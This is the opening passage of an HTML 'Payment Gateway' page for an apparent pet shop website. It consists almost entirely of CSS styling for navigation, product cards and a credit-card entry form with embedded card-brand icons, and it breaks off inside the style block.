<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css" integrity="sha512-DTOQO9RWCH3ppGqcWaEA1BIZOC6xxalwEsw9c2QQeAIftl+Vegovlnee1c9QX4TctnWMn13TZye+giMm8e2LwA==" crossorigin="anonymous" referrerpolicy="no-referrer" />
    <link rel="icon" type="image/x-icon" href="https://cdn-icons-png.flaticon.com/128/3460/3460335.png">
    <link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Roboto+Slab:wght@100..900&family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap" rel="stylesheet">
    <title>Payment Gateway</title>
    
    <style>
        :root {
        --text-01: #45413E;
        --light-01: #F9F9F9;
        --light-02: #FFFFFF;
        --brand-01: #DB7F67;
        --brand-02: #F4CFC6;
        --card-hover: 0px 4px 24px rgba(0, 0, 0, 0.15);
        --card-shadow: 0px 4px 16px rgba(0, 0, 0, 0.1);
        --hover-timing: all 0.2s ease;
        --nav-card-size: 240px;
        -webkit-font-smoothing: antialiased;
        font-smoothing: antialiased;
        scroll-behavior: smooth;
    }
    
    * {
        box-sizing: border-box;
        padding: 0;
        margin: 0;
    }
    
    body {
        font-family: 'Poppins', sans-serif;
        font-weight: 500;
        transition: var(--hover-timing);
    
        background: var(--light-01);
        width: 100vw;
        overflow-x: hidden;
    
    }
    
    header {
        /*    width: 100%;*/
        height: auto;
        position: sticky;
        top: 0;
        /*    border: 1px solid red;*/
        z-index: 100;
    }
    
    .banner {
        background: #396969;
        color: var(--light-01);
        font-size: 14px;
        font-weight: 500;
        line-height: 1.2;
        padding: 8px 24px;
        display: flex;
        align-items: center;
        justify-content: center;
    
    }
    
    nav {
        color: var(--text-01);
        font-weight: 600;
        height: 64px;
        background: var(--light-01);
        display: flex;
        flex-direction: row;
        align-items: center;
        justify-content: space-between;
        padding: 0 var(--pg-margin);
        border-bottom: 1px solid rgba(0, 0, 0, 0.1);
        z-index: 100;
    }
    
    nav ul.navigation-menu {
        display: flex;
        flex-direction: row;
        flex: 1;
        justify-content: center;
        position: relative;
        top: 0;
    }
    
    nav .navigation-menu a {
        font-size: 16px;
        text-decoration: none;
        color: var(--text-01);
    
    }
    
    nav .navigation-menu > li {
        display: flex;
        flex-direction: column;
        align-items: center;
        /*    justify-items: center;*/
    }
    
    nav .navigation-menu > li > a {
        position: relative;
        /*    border: 1px solid purple;*/
        padding: 0 20px;
        height: 64px;
        display: flex;
        align-items: center;
        justify-items: center;
    }
    
    nav .navigation-menu > li:hover ul.subnav {
        visibility: visible;
        opacity: 1;
        top: 64px;
    
    }
    
    
    nav .navigation-menu > li > ul.subnav {
        /*    border: 1px solid green;*/
        visibility: hidden;
        position: absolute;
        display: flex;
        flex-direction: row;
        top: 66px;
        background: var(--light-01);
        box-shadow: var(--card-hover);
        border-radius: 12px;
        opacity: 0;
        transition: var(--hover-timing);
    }
    
    
    nav > #logo {
        display: flex;
        flex-direction: row;
        align-items: center;
        grid-gap: 8px;
        line-height: 100%;
    }
    
    nav > #logo > span {
        font-size: 32px;
    }
    
    nav > #utility {
        display: flex;
        flex-direction: row;
        align-items: center;
        grid-gap: 16px;
    }
    
    .card-large,
    .card-med {
        /*    border: 1px solid orange;*/
        flex: 1;
        /*    width: var(--nav-card-size);*/
    
        position: relative;
        display: flex;
        flex-direction: column;
        /*    padding: 24px;*/
        transition: var(--hover-timing);
        cursor: pointer;
    }
    
    
    .card-large {
        box-shadow: var(--card-shadow);
        border-radius: 12px;
        overflow: hidden;
        /*    padding-bottom: 32px;*/
    }
    
    
    
    .card-large:hover {
        box-shadow: var(--card-hover);
        transform: scale(1.01);
    }
    
    .card-med:hover .card-image {
        transform: scale(1.01);
    }
    
    
    .card-image {
        width: 100%;
        /*    height: 90%;*/
        aspect-ratio: 1/1;
        position: relative;
        border-radius: 12px;
        overflow: hidden;
        display: flex;
        align-items: center;
        justify-content: center;
        transition: var(--hover-timing);
    }
    
    .card-large > .card-image {
        aspect-ratio: 3/2;
    }
    
    .card-image > img {
        width: 100%;
        height: 100%;
        position: absolute;
        object-fit: contain;
    
    
    
    }
    
    .card-large a {
        text-decoration: none;
        font-weight: 600;
    }
    
    .card-large > .card-image > a {
        position: absolute;
        bottom: 0;
        z-index: 1;
        width: 100%;
        font-size: 24px;
        line-height: 1.2;
    }
    
    
    
    
    .card-large > ul {
        /*    padding: 16px 0 24px;*/
        display: flex;
        flex-direction: column;
        grid-gap: 8px;
        flex: 1;
        /*    border: 1px solid blue;*/
    
        color: var(--text-01);
    
        padding: 0 40px 40px;
        font-size: 28px;
        font-weight: 600;
        line-height: 1.5;
    }
    
    
    
    .card-large > ul > li a {
        line-height: 32px;
        font-size: 14px;
        /*    border: 1px solid red;*/
    }
    
    
    .card-large#sup-dog,
    .card-med#sup-dog > .card-image {
        background: linear-gradient(45deg, #463631 0%, #976C5B 100%);
    }
    
    
    button.btn-outline {
        color: var(--light-01);
        border-color: var(--light-01);
    }
    
    
    .card-large#sup-cat,
    .card-med#sup-cat > .card-image {
        background: linear-gradient(45deg, #F6AE6C 0%, #ECBD73 100%);
    }
    
    
    .card-large#sup-bird,
    .card-med#sup-bird > .card-image {
        background: linear-gradient(45deg, #EFEFEF 0%, #F2F2F2 100%);
    }
    
    
    .card-large#sup-fish,
    .card-med#sup-fish > .card-image {
        background: linear-gradient(45deg, #1E4782 0%, #709DDF 100%);
    }
    
    
    .card-large.card-dark a,
    .card-large.card-dark > ul {
        color: var(--text-01);
    }
    
    .card-large.card-light a,
    .card-large.card-light > ul {
        color: var(--light-01);
    }
    
    
    
    button {
        font-size: 14px;
        font-weight: 600;
        line-height: 24px;
        padding: 12px 24px;
        border-radius: 48px;
        display: flex;
        flex-direction: row;
        grid-gap: 8px;
        justify-content: center;
        align-items: center;
        cursor: pointer;
    }
    
    
    
    button.btn-outline-light {
        color: var(--light-01);
        background: none;
        color: var(--light-01);
        border: 2px solid var(--light-01);
    }
    
    button.btn-outline-dark {
        color: var(--text-01);
        background: none;
        color: var(--text-01);
        border: 2px solid var(--text-01);
    }
    
    button.btn-filled-dark {
        color: var(--light-01);
        background: var(--text-01);
        color: var(--light-01);
        border: 2px solid var(--text-01);
    }
    
    .btn-outline-dark:hover {
        background: var(--text-01);
        border: 2px solid var(--text-01);
    }
    
    .btn-outline-light:hover {
        background: var(--light-01);
        border: 2px solid var(--light-01);
        color: var(--text-01);
    }
    
    
    button:hover,
    .btn-outline-dark.btn-hover-color:hover {
        color: var(--light-01);
        border: 2px solid var(--brand-01);
        background: var(--brand-01);
        transition: var(--hover-timing);
        box-shadow: var(--card-hover);
    }
    
    
    section,
    footer {
        position: relative;
        width: 100%;
        padding: 0 var(--pg-margin);
    }
    
    
    
    
    section.hero {
        /*    width: 100%;*/
        height: auto;
        background: rgb(164 197 197) url('https://ouch-cdn2.icons8.com/54_UqP4J-Ty83AU8SPGgcdzSt7V7yEVTcAiOcv2TJ9o/rs:fit:368:341/czM6Ly9pY29uczgu/b3VjaC1wcm9kLmFz/c2V0cy9wbmcvMjIv/ODg3ZmNiMDItNWRk/NC00ZmQ5LWExOWYt/MzNjNDA1NTYyNGNi/LnBuZw.png') no-repeat center right;
        display: flex;
        flex-direction: column;
        justify-content: center;
        align-items: flex-start;
        grid-gap: 48px;
        display: inline-flex;
    
    }
    
    .btn-group {
        display: flex;
        flex-direction: row;
        grid-gap: 16px;
    }
    
    section.hero h1 {
        font-size: var(--hero-text);
        font-weight: 600;
        line-height: 1.2;
        width: 40%;
        font-family: "Roboto Slab", serif;
        color: var(--text-01);
    }
    
    .card-med {
        width: var(--nav-card-size);
        height: auto;
        /*    border: 1px solid green;*/
        position: relative;
        display: flex;
        flex-direction: column;
        padding: 0;
    }
    
    .card-med > a {
        display: flex;
        flex-direction: column;
        grid-gap: 4px;
        padding: 12px 16px 0px;
    }
    
    .card-med > a > span {
        width: 100%;
        /*    border: 1px solid blue;*/
    }
    
    .card-med > a > span:nth-of-type(1) {
        width: 100%;
        /*    border: 1px solid blue;*/
        font-size: 24px;
        font-weight: 600;
        line-height: 1.2;
    }
    
    .card-med > a > span:nth-of-type(2) {
        font-size: 16px;
        font-weight: 500;
        line-height: 24px;
        display: flex;
        flex-direction: row;
        align-items: center;
        grid-gap: 6px;
    }
    
    .card-med > a > span:nth-of-type(2) > span {
        font-size: 18px;
    }
    
    #serv-groom > .card-image {
        background: linear-gradient(45deg, #45828C 0%, #A7D4D8 100%);
    }
    
    #serv-board > .card-image {
        background: linear-gradient(45deg, #EDDAA9 0%, #B87D93 100%);
    }
    
    .card-med:hover .card-image {
        box-shadow: var(--card-hover);
    }
    
    
    .card-med > .card-image {
        box-shadow: var(--card-shadow);
    }
    
    .card-med > .card-image > img {
        width: 80%;
        height: 80%;
        /*    border: 1px solid red;*/
    }
    
    section:not(.hero) {
        padding: calc(var(--pg-margin)/2) var(--pg-margin);
    }
    
    section h2 {
        font-size: 32px;
        font-weight: 600;
        line-height: 1.2;
        text-align: center;
        color: var(--text-01);
        margin-bottom: 32px;
        font-family: "Roboto Slab", serif;
        /*    padding-bottom: 24px;*/
    }
    
    
    .card-wide {
        flex-direction: row;
        padding: 0;
    }
    
    .card-wide .card-image {
        width: 50%;
        border-radius: 0;
    }
    
    .card-image img {
        width: 80%;
        height: 80%;
    }
    
    .card-wide > ul {
        padding: 40px;
    }
    
    .card-wide > ul > li {
        width: 100%;
        display: flex;
        flex-direction: row;
        justify-content: space-between;
        grid-gap: 24px;
        margin-bottom: 16px;
    }
    
    
    .card-wide .subtitle {
        font-size: 14px;
        line-height: 1.4;
        font-weight: 500;
        /*    margin-top: 8px;*/
        margin-bottom: 24px;
    }
    
    .card-wide > ul > li span {
        font-size: 16px;
    }
    
    .card-large > ul > li:last-of-type {
        margin-bottom: 40px;
    }
    
    
    .card-large button {
        margin-top: auto;
    }
    
    #locate > div {
        background: rgb(164 197 197);
        display: flex;
        flex-direction: column;
        justify-content: center;
        align-items: center;
        padding: 80px 0;
        border-radius: 12px;
        box-shadow: var(--card-shadow);
        transition: var(--hover-timing);
        cursor: pointer;
    }
    
    #locate > div:hover {
        box-shadow: var(--card-hover);
    }
    
    #locate h2 {
        margin-top: 0;
    }
    
    #locate p {
        line-height: 1.5;
        margin-bottom: 40px;
        width: 50%;
        text-align: center;
    }
    
    
    .btn-group {
        display: flex;
        flex-direction: row;
        grid-gap: 16px;
    }
    
    footer {
        background: var(--text-01);
        padding: 80px 80px 0px;
        margin-top: 80px;
        display: flex;
    }
    
    
    
    footer ul {
        display: flex;
        flex-direction: column;
        grid-gap: 24px;
        box-shadow: none;
        flex: 1;
        color: var(--light-01);
        font-size: 18px;
        font-weight: 600;
        margin-bottom: 80px;
    
    }
    
    
    footer ul li a {
        color: var(--light-01);
        text-decoration: none;
        font-size: 14px;
    }
    
    
    footer ul li {
        color: var(--light-01);
        padding: 0;
    
    }
    
    
    
    @media only screen and (max-width: 600px) {
        :root {
            --pg-margin: 16px;
        }
    
        section.hero {
            aspect-ratio: 1/1;
            padding-top: 64px;
    
        }
    
        section.hero h1 {
            --hero-text: 40px;
            width: 80%;
        }
    
        section.hero {
            background-size: 85%;
            background-position: 360% 60%;
        }
    
        nav {
            position: relative;
        }
    
        nav ul.navigation-menu {
            position: absolute;
            position: absolute;
            top: 64px;
            background: var(--light-01);
            left: 0;
            z-index: -1;
            width: 100vw;
        }
    
        nav ul.navigation-menu li a {
            font-size: 16px;
            /*        padding: 0 12px;*/
            white-space: nowrap;
        }
    
        nav ul.navigation-menu .subnav {
            display: none;
        }
    
        nav ul.navigation-menu > li:hover .subnav {
            display: none;
        }
    
    
        .btn-group {
            flex-direction: column;
        }
    
        .shop-pets,
        .services {
            display: flex;
            flex-direction: column;
            grid-gap: 24px;
            width: 100%;
        }
    
        .services > li {
            display: flex;
            flex-direction: column;
        }
    
        .services > li > .card-image {
            width: 100%;
        }
    
        section:not(.hero) {
            padding: var(--pg-margin);
        }
    
        #locate p {
    
            width: 80%;
        }
    
        footer {
            flex-direction: column;
            text-align: center;
        }
    
    
    }
    
    @media only screen and (min-width: 600px) {
        :root {
            --pg-margin: 24px;
        }
    
        section.hero h1 {
            --hero-text: 40px;
            width: 60%;
        }
    
        section.hero {
            aspect-ratio: 3/2;
            background-size: 50%;
            background-position: 90% 70%;
            padding-top: 64px;
    
        }
    
        nav {
            position: relative;
    
        }
    
        nav ul.navigation-menu {
            position: absolute;
            top: 64px;
            background: var(--light-01);
            left: 0;
            z-index: -1;
            width: 100vw;
        }
    
        nav ul.navigation-menu li a {
            font-size: 16px;
            white-space: nowrap;
        }
    
        nav ul.navigation-menu .subnav {
            display: none;
        }
    
        nav ul.navigation-menu > li:hover .subnav {
            display: none;
        }
    
        .btn-group {
            display: flex;
            flex-direction: column;
        }
    
        .shop-pets {
            display: grid;
            grid-template-columns: 1fr 1fr;
            grid-row: auto auto;
            grid-column-gap: 24px;
            grid-row-gap: 24px;
        }
    
        .services {
            display: flex;
            flex-direction: column;
            grid-gap: 24px;
        }
    
        section:not(.hero) {
            padding: var(--pg-margin);
        }
    
        #locate p {
    
            width: 60%;
        }
    
        footer {
            flex-direction: column;
            text-align: center;
        }
    }
    
    @media only screen and (min-width: 1200px) {
        :root {
            --pg-margin: 48px;
        }
    
        section.hero h1 {
            --hero-text: 48px;
        }
    
        section.hero {
            aspect-ratio: 2/1;
    
        }
    
        .btn-group {
            flex-direction: row;
        }
    
        .shop-pets,
        .services {
            display: flex;
            flex-direction: row;
            grid-gap: 24px;
        }
    
        ul.subnav {
            display: grid;
            grid-template-columns: 1fr 1fr;
            grid-row: auto auto;
            grid-column-gap: 24px;
            grid-row-gap: 24px;
            padding: 48px;
        }
    
    
        nav ul.navigation-menu {
            top: 0;
            z-index: 1;
            background: none;
            width: auto;
            position: relative;
        }
    
        nav ul.navigation-menu .subnav {
            display: flex;
        }
    
        nav ul.navigation-menu > li:hover .subnav {
            display: flex;
        }
    
        #locate p {
    
            width: 40%;
        }
    
        footer {
    
    
            flex-direction: row;
            text-align: left;
    
        }
    }
    
    /* Extra large devices (large laptops and desktops, 1200px and up) */
    @media only screen and (min-width: 1200px) {
        :root {
            --pg-margin: 80px;
        }
    
        section.hero h1 {
            --hero-text: 56px;
        }
    
        nav .navigation-menu > li > ul.subnav {
            padding: 48px;
            grid-gap: 24px;
        }
    
        section.hero {
            aspect-ratio: 3/1;
            background-size: 30%;
            background-position: 90% 60%;
        }
    
        .shop-pets,
        .services {
            display: flex;
            flex-direction: row;
            grid-gap: 24px;
        }
    
        nav ul.navigation-menu {
            top: 0;
            z-index: 1;
            background: none;
            width: auto;
            position: relative;
        }
    
        ul.subnav {
            display: grid;
            grid-template-columns: 1fr 1fr;
            grid-row: auto auto;
            grid-column-gap: 24px;
            grid-row-gap: 24px;
            padding: 48px;
        }
    
        nav ul.navigation-menu > li:hover .subnav {
            display: grid;
        }
    
        #locate p {
    
            width: 40%;
        }
    
        footer {
    
    
            flex-direction: row;
            text-align: left;
    
        }
    
    }
    .wrappermain {
            max-width: 450px;
            width: 100%;
            margin: 30px auto 0;
            padding: 10px
        }

        .wrappermain .form_container {
            background: var(--brand-02);
            padding: 30px;
            box-shadow: 1px 1px 15px rgba(0, 0, 0, 0.15);
            border-radius: 3px;
            margin-top: -30px
        }

        .wrappermain .form_container .form_item {
            margin-bottom: 25px
        }

        .form_wrap.fullname,
        .form_wrap.select_box {
            display: flex
        }

        .form_wrap.fullname .form_item,
        .form_wrap.select_box .form_item {
            width: 50%
        }

        .form_wrap.fullname .form_item:first-child,
        .form_wrap.select_box .form_item:first-child {
            margin-right: 4%
        }

        .wrappermain .form_container .form_item label {
            margin-bottom: 5px
        }

        .form_item input[type="text"],
        .form_item select {
            width: 100%;
            height: 47px;
            padding: 13px;
            font-size: 16px;
            background-color: rgb(164 197 197);
            border: 2px solid var(--text-01);
            border-radius: 13px;
            color: #fff
        }

        .form_item input[type="text"]:focus {
            border-color: #6271f0
        }
        .form_item textarea,
        .form_item select {
            width: 420px;
            height: 47px;
            padding: 13px;
            font-size: 16px;
            background-color: rgb(164 197 197);
            border: 2px solid var(--text-01);
            border-radius: 13px;
            color: #fff
        }

        .form_item textarea:focus {
            border-color: #6271f0
        }
        .form_wrap {
        margin-right: 30px;
    }
    .visuallyhidden {
  border: 0;
  clip: rect(0 0 0 0);
  height: 1px;
  margin: -1px;
  overflow: hidden;
  padding: 0;
  position: absolute;
  width: 1px;
  overflow: hidden;
}

input {
  width: calc(100% - 10px);
  min-height: 30px;
  padding-left: 5px;
  padding-right: 5px;
  letter-spacing: 0.5px;
  border: 0;
  border-bottom: 2px solid #f0f0f0;
}
input:valid {
  border-color: #24cf5f;
}
input:focus {
  outline: none;
  border-color: #fbcf34;
}

.form-list {
  padding-left: 0;
  list-style: none;
}
.form-list__row {
  margin-bottom: 25px;
}
.form-list__row label {
  position: relative;
  display: block;
  text-transform: uppercase;
  font-weight: 600;
  font-size: 11px;
  letter-spacing: 0.5px;
  color: #939393;
}
.form-list__row--inline {
  display: -ms-flexbox;
  display: flex;
  -ms-flex-pack: justify;
  justify-content: space-between;
}
.form-list__row--inline > :first-child {
  -ms-flex: 2;
  flex: 2;
  padding-right: 20px;
}
.form-list__row--inline > :nth-child(2n) {
  -ms-flex: 1;
  flex: 1;
}
.form-list__input-inline {
  display: -ms-flexbox;
  display: flex;
  -ms-flex-pack: justify;
  justify-content: space-between;
}
.form-list__input-inline > * {
  width: calc(50% - 10px - 10px);
}
.form-list__row--agree {
  margin-top: 30px;
  margin-bottom: 30px;
  font-size: 12px;
}
.form-list__row--agree label {
  font-weight: 400;
  text-transform: none;
  color: #676767;
}
.form-list__row--agree input {
  width: auto;
  margin-right: 5px;
}

#input--cc {
  position: relative;
  padding-top: 6px;
}
#input--cc input {
  padding-left: 46px;
  width: calc(100% - 46px);
}
#input--cc:before {
  content: "";
  position: absolute;
  left: 0;
  top: 50%;
  width: 36px;
  height: 45px;
  background-image: url("data:image/svg+xml;utf8,%3Csvg%20class%3D%22nc-icon%20glyph%22%20xmlns%3D%22http%3A//www.w3.org/2000/svg%22%20xmlns%3Axlink%3D%22http%3A//www.w3.org/1999/xlink%22%20x%3D%220px%22%20y%3D%220px%22%20width%3D%2248px%22%20height%3D%2248px%22%20viewBox%3D%220%200%2048%2048%22%3E%3Cg%3E%20%3Cpath%20data-color%3D%22color-2%22%20fill%3D%22%238c8c8c%22%20d%3D%22M47%2C16V9c0-1.105-0.895-2-2-2H3C1.895%2C7%2C1%2C7.895%2C1%2C9v7H47z%22%3E%3C/path%3E%20%3Cpath%20fill%3D%22%238c8c8c%22%20d%3D%22M1%2C22v17c0%2C1.105%2C0.895%2C2%2C2%2C2h42c1.105%2C0%2C2-0.895%2C2-2V22H1z%20M18%2C33H8c-0.552%2C0-1-0.448-1-1s0.448-1%2C1-1h10%20c0.552%2C0%2C1%2C0.448%2C1%2C1S18.552%2C33%2C18%2C33z%20M40%2C33h-5c-0.552%2C0-1-0.448-1-1s0.448-1%2C1-1h5c0.552%2C0%2C1%2C0.448%2C1%2C1S40.552%2C33%2C40%2C33z%22%3E%3C/path%3E%20%3C/g%3E%3C/svg%3E");
  background-position: center;
  background-repeat: no-repeat;
  background-size: 36px;
  -ms-transform: translateY(-50%);
  transform: translateY(-50%);
}

#input--cc.creditcard-icon--visa:before {
  background-image: url("data:image/svg+xml;utf8,%3Csvg%20class%3D%22nc-icon%20colored%22%20xmlns%3D%22http%3A//www.w3.org/2000/svg%22%20xmlns%3Axlink%3D%22http%3A//www.w3.org/1999/xlink%22%20x%3D%220px%22%20y%3D%220px%22%20width%3D%2248px%22%20height%3D%2248px%22%20viewBox%3D%220%200%2048%2048%22%3E%3Cg%3E%3Crect%20x%3D%221%22%20y%3D%2214%22%20fill%3D%22%23E6E6E6%22%20width%3D%2246%22%20height%3D%2219%22%3E%3C/rect%3E%20%3Cpath%20fill%3D%22%23E79800%22%20d%3D%22M4%2C41h40c1.657%2C0%2C3-1.343%2C3-3v-5H1v5C1%2C39.657%2C2.343%2C41%2C4%2C41z%22%3E%3C/path%3E%20%3Cpath%20fill%3D%22%231A1876%22%20d%3D%22M44%2C7H4c-1.657%2C0-3%2C1.343-3%2C3v5h46v-5C47%2C8.343%2C45.657%2C7%2C44%2C7z%22%3E%3C/path%3E%20%3Cpolygon%20fill%3D%22%231A1876%22%20points%3D%2219.238%2C28.8%2021.847%2C28.8%2023.48%2C19.224%2020.87%2C19.224%20%22%3E%3C/polygon%3E%20%3Cpath%20fill%3D%22%231A1876%22%20d%3D%22M28.743%2C23.069c-0.912-0.443-1.471-0.739-1.465-1.187c0-0.398%2C0.473-0.824%2C1.495-0.824%20c0.836-0.013%2C1.51%2C0.157%2C2.188%2C0.477l0.354-2.076c-0.517-0.194-1.327-0.402-2.339-0.402c-2.579%2C0-4.396%2C1.299-4.411%2C3.16%20c-0.015%2C1.376%2C1.297%2C2.144%2C2.287%2C2.602c1.016%2C0.469%2C1.358%2C0.769%2C1.353%2C1.188c-0.006%2C0.642-0.811%2C0.935-1.562%2C0.935%20c-1.158%2C0-1.742-0.179-2.793-0.655l-0.366%2C2.144c0.61%2C0.267%2C1.737%2C0.499%2C2.908%2C0.511c2.744%2C0%2C4.525-1.284%2C4.545-3.272%20C30.944%2C24.581%2C30.249%2C23.752%2C28.743%2C23.069z%22%3E%3C/path%3E%20%3Cpath%20fill%3D%22%231A1876%22%20d%3D%22M38.007%2C19.233H35.99c-0.625%2C0-1.092%2C0.171-1.367%2C0.794l-3.876%2C8.776h2.741c0%2C0%2C0.448-1.18%2C0.55-1.439%20c0.3%2C0%2C2.962%2C0.004%2C3.343%2C0.004c0.078%2C0.335%2C0.318%2C1.435%2C0.318%2C1.435h2.422L38.007%2C19.233z%20M34.789%2C25.406%20c0.108-0.276%2C1.173-3.011%2C1.386-3.591c0.353%2C1.651%2C0.009%2C0.049%2C0.781%2C3.591H34.789z%22%3E%3C/path%3E%20%3Cpath%20fill%3D%22%231A1876%22%20d%3D%22M17.049%2C19.231l-2.556%2C6.53l-0.272-1.327l-0.915-4.401c-0.158-0.606-0.616-0.787-1.183-0.808H7.913%20L7.88%2C19.424c1.024%2C0.248%2C1.939%2C0.606%2C2.742%2C1.05l2.321%2C8.317l2.762-0.003l4.109-9.558H17.049z%22%3E%3C/path%3E%3C/g%3E%3C/svg%3E");
}

#input--cc.creditcard-icon--master-card:before {
  background-image: url("data:image/svg+xml;utf8,%3Csvg%20class%3D%22nc-icon%20colored%22%20xmlns%3D%22http%3A//www.w3.org/2000/svg%22%20xmlns%3Axlink%3D%22http%3A//www.w3.org/1999/xlink%22%20x%3D%220px%22%20y%3D%220px%22%20width%3D%2248px%22%20height%3D%2248px%22%20viewBox%3D%220%200%2048%2048%22%3E%3Cg%3E%3Cpath%20fill%3D%22%23003564%22%20d%3D%22M44%2C7H4c-1.657%2C0-3%2C1.343-3%2C3v28c0%2C1.657%2C1.343%2C3%2C3%2C3h40c1.657%2C0%2C3-1.343%2C3-3V10C47%2C8.343%2C45.657%2C7%2C44%2C7z%22%3E%3C/path%3E%20%3Ccircle%20fill%3D%22%23F01524%22%20cx%3D%2219%22%20cy%3D%2224%22%20r%3D%228%22%3E%3C/circle%3E%20%3Cpath%20fill%3D%22%23376BD1%22%20d%3D%22M24%2C30.24c0.093-0.075%2C0.177-0.161%2C0.267-0.24h-0.535C23.823%2C30.079%2C23.907%2C30.165%2C24%2C30.24z%22%3E%3C/path%3E%20%3Cpath%20fill%3D%22%23FEB415%22%20d%3D%22M29%2C16c-2.525%2C0-4.773%2C1.173-6.24%2C3h2.48c0.251%2C0.313%2C0.47%2C0.651%2C0.673%2C1h-3.827h-0.008%20c-0.186%2C0.321-0.352%2C0.653-0.492%2C1h0.009h4.809c0.132%2C0.324%2C0.246%2C0.656%2C0.335%2C1h-5.477c-0.084%2C0.326-0.151%2C0.659-0.193%2C1h5.865%20C26.975%2C23.328%2C27%2C23.661%2C27%2C24h-6c0%2C0.339%2C0.028%2C0.672%2C0.069%2C1h5.865c-0.043%2C0.341-0.111%2C0.674-0.195%2C1h-5.477%20c0.088%2C0.342%2C0.194%2C0.677%2C0.325%2C1h0.009h4.809c-0.141%2C0.346-0.305%2C0.68-0.491%2C1h-3.827h-0.008c0.203%2C0.351%2C0.429%2C0.686%2C0.681%2C1h2.48%20c-0.292%2C0.363-0.623%2C0.693-0.973%2C1h-0.535h-0.012c1.409%2C1.241%2C3.254%2C2%2C5.279%2C2c4.418%2C0%2C8-3.582%2C8-8S33.418%2C16%2C29%2C16z%22%3E%3C/path%3E%3C/g%3E%3C/svg%3E");
}

#input--cc.creditcard-icon--american-express:before {
  background-image: url("data:image/svg+xml;utf8,%3Csvg%20class%3D%22nc-icon%20colored%22%20xmlns%3D%22http%3A//www.w3.org/2000/svg%22%20xmlns%3Axlink%3D%22http%3A//www.w3.org/1999/xlink%22%20x%3D%220px%22%20y%3D%220px%22%20width%3D%2248px%22%20height%3D%2248px%22%20viewBox%3D%220%200%2048%2048%22%3E%3Cg%3E%3Cpath%20fill%3D%22%23007AC6%22%20d%3D%22M44%2C7H4c-1.657%2C0-3%2C1.343-3%2C3v28c0%2C1.657%2C1.343%2C3%2C3%2C3h40c1.657%2C0%2C3-1.343%2C3-3V10C47%2C8.343%2C45.657%2C7%2C44%2C7z%22%3E%3C/path%3E%20%3Cpath%20fill%3D%22%23FFFFFF%22%20d%3D%22M10.533%2C24.429h2.33l-1.165-2.857L10.533%2C24.429z%20M43%2C19h-5.969l-1.456%2C1.571L34.264%2C19H21.598l-1.165%2C2.571%20L19.268%2C19h-5.096v1.143L13.59%2C19H9.222L5%2C29h5.096l0.582-1.571h1.456L12.716%2C29h5.678v-1.143L18.831%2C29h2.912l0.437-1.286V29%20h11.648l1.456-1.571L36.594%2C29h5.969l-3.785-5L43%2C19z%20M25.383%2C27.571h-1.602V22l-2.475%2C5.571h-1.456L17.375%2C22v5.571h-3.349%20L13.444%2C26H9.95l-0.582%2C1.571H7.475l3.057-7.143h2.475l2.766%2C6.714v-6.714h2.766l2.184%2C4.857l2.038-4.857h2.766v7.143H25.383z%20M39.797%2C27.571h-2.184l-1.893-2.429l-2.184%2C2.429h-6.552v-7.143h6.697l2.038%2C2.286l2.184-2.286h2.038L36.739%2C24L39.797%2C27.571z%20M28.586%2C21.857v1.286h3.64v1.429h-3.64V26h4.077l1.893-2.143l-1.747-2H28.586z%22%3E%3C/path%3E%3C/g%3E%3C/svg%3E");
}

#input--cc.creditcard-icon--discover:before {
  background-image: url("data:image/svg+xml;utf8,%3Csvg%20class%3D%22nc-icon%20colored%22%20xmlns%3D%22http%3A//www.w3.org/2000/svg%22%20xmlns%3Axlink%3D%22http%3A//www.w3.org/1999/xlink%22%20x%3D%220px%22%20y%3D%220px%22%20width%3D%2248px%22%20height%3D%2248px%22%20viewBox%3D%220%200%2048%2048%22%3E%3Cg%3E%3Cpath%20fill%3D%22%23E6E6E6%22%20d%3D%22M47%2C23.807V10c0-1.657-1.343-3-3-3H4c-1.657%2C0-3%2C1.343-3%2C3v28c0%2C1.657%2C1.343%2C3%2C3%2C3h10.589%20C30.229%2C38.811%2C43.003%2C30.094%2C47%2C23.807z%22%3E%3C/path%3E%20%3Cpath%20fill%3D%22%23E6E6E6%22%20d%3D%22M47%2C38V23.807C43.003%2C30.094%2C30.229%2C38.811%2C14.589%2C41H44C45.657%2C41%2C47%2C39.657%2C47%2C38z%22%3E%3C/path%3E%20%3Cpath%20fill%3D%22%23FA7000%22%20d%3D%22M47%2C38V23.807C43.003%2C30.094%2C30.229%2C38.811%2C14.589%2C41H44C45.657%2C41%2C47%2C39.657%2C47%2C38z%22%3E%3C/path%3E%20%3Cpath%20fill%3D%22%23FA7000%22%20d%3D%22M25.029%2C21.013c-1.69%2C0-3.062%2C1.32-3.062%2C2.951c0%2C1.734%2C1.312%2C3.028%2C3.062%2C3.028%20c1.708%2C0%2C3.054-1.313%2C3.054-2.995C28.084%2C22.325%2C26.747%2C21.013%2C25.029%2C21.013z%22%3E%3C/path%3E%20%3Cpath%20fill%3D%22%23444444%22%20d%3D%22M7.646%2C21.121H6v5.743h1.636c0.871%2C0%2C1.499-0.207%2C2.05-0.664c0.654-0.541%2C1.043-1.359%2C1.043-2.206%20C10.728%2C22.298%2C9.462%2C21.121%2C7.646%2C21.121z%20M8.956%2C25.434c-0.356%2C0.318-0.81%2C0.457-1.535%2C0.457H7.121v-3.798h0.301%20c0.725%2C0%2C1.161%2C0.13%2C1.535%2C0.464c0.385%2C0.345%2C0.617%2C0.878%2C0.617%2C1.429C9.573%2C24.539%2C9.342%2C25.091%2C8.956%2C25.434z%22%3E%3C/path%3E%20%3Crect%20x%3D%2211.245%22%20y%3D%2221.121%22%20fill%3D%22%23444444%22%20width%3D%221.116%22%20height%3D%225.743%22%3E%3C/rect%3E%20%3Cpath%20fill%3D%22%23444444%22%20d%3D%22M15.102%2C23.322c-0.674-0.247-0.871-0.412-0.871-0.722c0-0.361%2C0.352-0.635%2C0.836-0.635%20c0.335%2C0%2C0.612%2C0.134%2C0.906%2C0.462l0.583-0.764c-0.481-0.424-1.058-0.638-1.686-0.638c-1.016%2C0-1.791%2C0.707-1.791%2C1.642%20c0%2C0.794%2C0.36%2C1.197%2C1.411%2C1.579c0.439%2C0.153%2C0.662%2C0.257%2C0.776%2C0.328c0.224%2C0.145%2C0.335%2C0.352%2C0.335%2